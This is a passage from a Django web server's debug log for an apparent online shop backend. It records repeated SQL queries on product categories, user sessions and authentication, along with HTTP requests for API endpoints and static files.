"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:21:32,042 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:21:32,044 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-09 06:21:32,082 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:21:32,085 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-09 06:21:32,105 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T06:21:32.101093+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 6, 21, 32, 101093, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 06:21:32,106 utils 32196 139885028853504 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T06:21:32.088239+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 6, 21, 32, 88239, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 06:21:32,120 utils 32196 139885028853504 (0.011) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 06:21:32,146 utils 32196 139885028853504 (0.008) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-09 06:21:32,148 utils 32196 139885028853504 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-09 06:21:32,162 utils 32196 139885028853504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() Not Found: /robots.txt [09/Dec/2019 06:21:32] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-09 06:21:32,194 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T06:21:32.192040+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 6, 21, 32, 192040, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 06:21:32] "GET /api/v1/categories/ HTTP/1.0" 200 14647 DEBUG 2019-12-09 06:21:32,297 utils 32196 139885028853504 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T06:21:32.294407+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 6, 21, 32, 294407, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 06:21:32] "GET /shop/category/ HTTP/1.0" 200 6758 [09/Dec/2019 06:21:32] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:32] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:32] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:32] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:32] "GET /static/admin/css/changelists.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:32] "GET /static/rest_framework/css/default.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:33] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:33] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:33] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:33] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [09/Dec/2019 06:21:33] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:33] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 304 0 DEBUG 2019-12-09 06:21:33,716 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T06:21:33.705253+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 6, 21, 33, 705253, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 06:21:33,718 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [09/Dec/2019 06:21:33] "GET /jsi18n/ HTTP/1.0" 200 3223 [09/Dec/2019 06:21:33] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:34] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:34] "GET /static/rest_framework/js/default.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:34] "GET /static/admin/js/jquery.init.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:34] "GET /static/admin/js/core.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:34] "GET /static/rest_framework/img/grid.png HTTP/1.0" 304 0 [09/Dec/2019 06:21:34] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:35] "GET /static/admin/js/actions.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:35] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:35] "GET /static/admin/js/prepopulate.js HTTP/1.0" 304 0 [09/Dec/2019 06:21:35] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 304 0 Not Found: /favicon.ico [09/Dec/2019 06:21:35] "GET /favicon.ico HTTP/1.0" 404 6629 [09/Dec/2019 06:21:36] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 304 0 [09/Dec/2019 06:21:36] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [09/Dec/2019 06:21:36] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [09/Dec/2019 06:21:36] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 [09/Dec/2019 06:25:13] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:30:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 06:33:59,655 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:33:59,659 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:33:59,662 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:33:59,664 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:33:59,666 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:33:59,668 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:33:59,671 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:33:59,673 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:33:59,675 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:33:59,677 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:33:59,679 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:33:59] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [09/Dec/2019 06:34:00] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [09/Dec/2019 06:38:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 06:41:38,562 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:41:38,566 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:41:38,568 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:41:38,571 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:41:38,573 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:41:38,575 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:41:38,577 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:41:38,580 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:41:38,582 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:41:38,584 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:41:38,586 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:41:38] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 06:42:50,488 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:42:50,493 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:42:50,495 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:42:50,498 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:42:50,500 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:42:50,502 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:42:50,505 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:42:50,507 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:42:50,509 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:42:50,511 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 06:42:50,514 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 06:42:50] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 06:43:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 06:43:48,487 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:43:48,492 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:43:48,494 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:43:48,496 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:43:48,498 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:43:48,500 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:43:48,503 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:43:48,505 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:43:48,507 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 06:43:48,509 utils 32196 139885050582784 